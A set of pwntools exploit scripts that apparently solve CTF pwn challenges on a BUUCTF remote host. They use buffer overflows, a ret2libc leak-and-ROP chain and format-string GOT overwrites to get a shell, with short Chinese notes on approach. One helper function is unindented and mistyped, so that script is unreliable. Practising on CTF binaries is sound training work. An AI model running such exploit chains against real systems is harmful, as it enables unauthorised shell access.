1.pwn1
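from pwn import *

# A bare `log_level = 'debug'` module variable has no effect; the setting
# lives on the pwntools global context.
context.log_level = 'debug'
elf = ELF("./pwn1")

# 0 = talk to the remote CTF instance, non-zero = run the binary locally.
local = 0
if local:
    r = process("./pwn1")
else:
    r = remote("node4.buuoj.cn", 29317)

# Addresses inside the challenge binary (values from the writeup; assumes a
# non-PIE build — TODO confirm with checksec).
bin_sh = 0x000000000040118A
system_addr = 0x0000000000401191

# 0x0F bytes of filler (offset from the challenge) followed by the two packed
# addresses; which stack slot each one lands in depends on the challenge's
# frame layout — TODO confirm.
payload = b'a'*0x0F + p64(system_addr) + p64(bin_sh)
r.sendline(payload)
r.interactive()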
2.warmup_csaw_2016
from pwn import *
# Debug logging plus the target triple used by p64() and friends.
context(os='linux',arch= 'amd64',log_level='debug')
elf = ELF("./warmup")
# 0 = talk to the remote CTF instance, non-zero = run the binary locally.
local = 0
if local:
    r = process("./warmup")
else:
    r = remote("node4.buuoj.cn",29230)
# Address inside the challenge binary (writeup value; assumes non-PIE — TODO confirm).
addr = 0x000000000040060e
# 72 bytes of filler (offset from the challenge; presumably up to the saved
# return address) and then the packed target address.
payload = b'a'*72 + p64(addr)
r.sendline(payload)
r.interactive()
3.cisn_2019_n_1
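from pwn import *

context(os='linux', arch='amd64', log_level='debug')
elf = ELF("./ciscn")

# 0 = talk to the remote CTF instance, non-zero = run the binary locally.
local = 0
if local:
    r = process("./ciscn")
else:
    r = remote("node4.buuoj.cn", 28539)

# 11.28125 encoded as a 32-bit IEEE-754 float. The original line used a
# C-style `//` comment, which Python parses as floor division and then
# rejects as a syntax error.
v2 = 0x41348000
# Filler up to the compared variable (0x30 - 0x04, offsets from the
# challenge), then the float's bit pattern.
payload = b'a'*(0x30-0x04) + p64(v2)
r.sendline(payload)
r.interactive()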
4.pwn1_sctf_2016
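from pwn import *

# A bare `log_level = 'debug'` module variable has no effect; the setting
# lives on the pwntools global context.
context.log_level = 'debug'
elf = ELF("./pwn1_sctf")

# 0 = talk to the remote CTF instance, non-zero = run the binary locally.
local = 0
if local:
    r = process("./pwn1_sctf")
else:
    r = remote("node4.buuoj.cn", 28883)

# Address inside the 32-bit challenge binary (writeup value; p32 below
# implies a 32-bit target — TODO confirm with checksec).
get_flag = 0x08048F0D
# 20 'I' bytes, 4 'a' bytes of filler and the packed target. The split
# between 'I' and 'a' filler is challenge-specific; the writeup does not
# explain it — TODO confirm against the binary.
payload = b'I'*20 + b'a'*4 + p32(get_flag)
r.sendline(payload)
r.interactive()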
5.level0
from pwn import *
# Debug logging plus the target triple used by p64().
context(os = 'linux',arch = 'amd64',log_level = 'debug')
elf = ELF("./level0")
# 0 = talk to the remote CTF instance, non-zero = run the binary locally.
local = 0
if local:
    r = process("./level0")
else:
    r = remote("node4.buuoj.cn",26837)
# Address inside the challenge binary (writeup value; assumes non-PIE — TODO confirm).
call_system = 0x0000000000400596
# 0x80 bytes of filler, one 8-byte zero (presumably the saved rbp slot —
# TODO confirm) and then the packed target address.
payload = b'a'*0x80+p64(0)+p64(call_system)
r.sendline(payload)
r.interactive()
6.ciscn_2019_c_1
from pwn import *
# Debug logging plus the target triple used by p64()/u64().
context(os= 'linux',arch='amd64',log_level='debug')
elf=ELF("./ciscn_2019")
# 0 = talk to the remote CTF instance, non-zero = run the binary locally.
local = 0
if local:
    r = process("./ciscn_2019")
else:
    r = remote("node4.buuoj.cn",29853)
def encrypt(paylaod):
l = list(payload)
for i in range(len(l)):
if l[i].isdigit():
l[i] = chr(ord(l[i])^0xF)
if l[i].isupper():
l[i] = chr(ord(l[i])^0xE)
if l[i].islower():
l[i] = chr(ord(l[i])^0xD)
return ''.join(l)
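# Gadget / function addresses from the challenge binary (writeup values;
# assumes non-PIE — TODO confirm with checksec).
pop_rdi = 0x0000000000400c83
pop_ret = 0x00000000004006b9
main_addr = 0x0000000000400B28
put_plt = elf.plt['puts']
put_got = elf.got['puts']

# Menu interaction: choose option 1 and wait for the input prompt.
r.recv()
r.sendline("1")
r.recvuntil("encrypted")

# Stage 1: filler (0x50 + 8, offset from the challenge), then a call to
# puts(puts@got) that returns to main so a second input can be sent. The
# payload is passed through encrypt() first, presumably because the binary
# applies the same XOR to its input (XOR is self-inverse) — TODO confirm.
payload = b'1'*(0x50+8) + p64(pop_rdi) + p64(put_got) + p64(put_plt) + p64(main_addr)
payload = encrypt(payload)
r.sendline(payload)

# The leaked pointer is on the line after "Ciphertext". It is printed as raw
# bytes, so it is right-padded to 8 bytes before u64(). The fill value must
# be bytes: the original used the str '\x00', which makes bytes.ljust()
# raise TypeError on Python 3.
r.recvuntil("Ciphertext\n")
r.recvuntil("\n")
puts_addr = u64(r.recvline()[:-1].ljust(8, b'\x00'))
log.success('puts_addr='+hex(puts_addr))

# libc base = leaked puts - its offset in the challenge's libc build
# (writeup offsets — TODO confirm against the libc shipped with the task).
puts_offset = 0x0809c0
libc_base = puts_addr - puts_offset
log.success('libc_base'+hex(libc_base))

r.sendlineafter("choice!","1")
system_offset = 0x04f440
bin_sh_offset = 0x1b3e9a
sys_addr = libc_base + system_offset
bin_sh = libc_base + bin_sh_offset

# Stage 2: same filler, pop_ret (presumably a plain `ret` for stack
# alignment — TODO confirm), then system("/bin/sh"). Unlike stage 1 this
# payload is sent without passing it through encrypt().
payload1 = b'a'*(0x50+0x8) + p64(pop_ret) + p64(pop_rdi) + p64(bin_sh) + p64(sys_addr)
r.sendline(payload1)
r.interactive()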
7.第五空间2019决赛pwn5
-
思路
-
思路1:直接利用格式化字符串改写unk_804C044之中的数据.第一个read利用格式化字符串漏洞修改unk_804C044的值,第二个read输入我们修改后的值去满足if判断从而执行system(‘/bin/sh’).
-
思路2:利用格式化字符串改写atoi的got地址,改为system_plt的地址.第一个read利用格式化字符串漏洞修改atoi_got为system_plt,第二个read输入"/bin/sh\x00",执行system(“/bin/sh”).
-
思路3:unk_804C044是随机生成的,我们可以自己写入一个值,然后在第二个read时再发送这个值.
-
exp1
-
from pwn import *
# Debug logging plus the 32-bit target triple used by p32().
context(os = 'linux',arch = 'i386',log_level = 'debug')
elf = ELF("./pwn")
# 0 = talk to the remote CTF instance, non-zero = run the binary locally.
local = 0
if local:
    r = process("./pwn")
else:
    r = remote("node4.buuoj.cn",27278)
# Approach 1 from the notes above: the address of unk_804C044 is placed at
# the start of the input and "%10$n" stores the number of bytes printed so
# far (the 4 address bytes) into it. Argument index 10 is presumably where
# the input buffer sits on the stack for this challenge — TODO confirm.
unk_addr = 0x0804C044
payload = p32(unk_addr)+b"%10$n"
r.sendline(payload)
# Second read: send the same value (4) that was just written.
r.sendline(str(0x04))#unk_addr = 4byte
r.interactive()
- exp2
from pwn import *
# Debug logging plus the 32-bit target triple used by fmtstr_payload().
context(os = 'linux',arch = 'i386',log_level = 'debug')
elf = ELF("./pwn")
# 0 = talk to the remote CTF instance, non-zero = run the binary locally.
local = 0
if local:
    r = process("./pwn")
else:
    r = remote("node4.buuoj.cn",27278)
# 0x804c000 0x804d000 rw-p # unk_804C044 0x0804C044
# Approach 2 from the notes above: addresses from the challenge binary
# (writeup values; assumes non-PIE — TODO confirm).
system_plt = 0x08049080
atoi_got = 0x0804C034
#payload = b'%10$n' + p32(atoi_got)+p32(system_plt)
# pwntools builds the format-string write of system_plt into atoi_got;
# 10 is the argument index where the input buffer lands (see exp1).
payload = fmtstr_payload(10,{atoi_got:system_plt})
r.sendline(payload)
# Second read: the string that the overwritten atoi entry now receives.
r.sendline("/bin/sh\x00")
r.interactive()
[fmtstr_payload用法](https://breeze-666.github.io/2022/01/14/noname/)
exp3
from pwn import *
# Debug logging plus the 32-bit target triple used by fmtstr_payload().
context(os = 'linux',arch = 'i386',log_level = 'debug')
elf = ELF("./pwn")
# 0 = talk to the remote CTF instance, non-zero = run the binary locally.
local = 0
if local:
    r = process("./pwn")
else:
    r = remote("node4.buuoj.cn",27278)
# Approach 3 from the notes above: overwrite unk_804C044 with a known value
# (1) via the format-string write, then send that same value on the second
# read. Argument index 10 as in exp1.
unk_addr = 0x0804C044
payload = fmtstr_payload(10,{unk_addr:0x1})
r.sendline(payload)
r.sendline(str(0x1))
r.interactive()